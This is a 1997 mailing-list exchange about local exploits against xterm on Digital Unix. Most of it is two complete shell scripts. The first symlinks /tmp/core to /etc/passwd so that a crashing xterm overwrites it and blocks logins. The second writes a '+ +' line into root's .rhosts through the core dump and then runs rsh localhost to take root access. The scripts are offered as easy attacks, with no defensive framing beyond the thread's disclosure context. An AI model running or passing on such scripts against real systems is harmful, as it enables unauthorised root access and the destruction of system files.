On Thu, 13 Nov 1997, Andrew Brown wrote:
> > Even with a buffer overflow, I've never seen anyone exploit on one
> >DU. If anyone has done so sucessfully, plese email me. Despite that, a
> >person with basic knowledge of unix could easily do something like:
> >
> >#/!bin/csh
> >cd /tmp
> >ln -s /etc/passwd /tmp/core
> >setenv DISPLAY abcdefghi
> >/usr/bin/X11/xterm
> >
> > The contents of /etc/passwd becomes xterm's core, preventing
> >further logins. Obviously you could do things without an immediate impact
> >such as ln -s /vmunix /tmp/core.
>
> or...if the system you're on is actually running r-services, you could do
>
> #!/bin/sh
> DISPLAY="
> + +
> "
> export DISPLAY
> cd /tmp
> ln -s /.rhosts /tmp/core
> /usr/bin/X11/xterm
> rsh localhost
>
> which sets the DISPLAY variable to an "admit all from all" line and
> the core dump will go into root's .rhosts file. then all that remains
> is the rsh localhost and you're all set!
>
> considerably easier than a buffer overflow exploit...
>
> --
> |-----< "CODE WARRIOR" >-----|
> andrew@echonyc.com (TheMan) * "ah! i see you have the internet
> codewarrior@daemon.org that goes *ping*!"
> warfare@graffiti.com * "information is power -- share the wealth."
>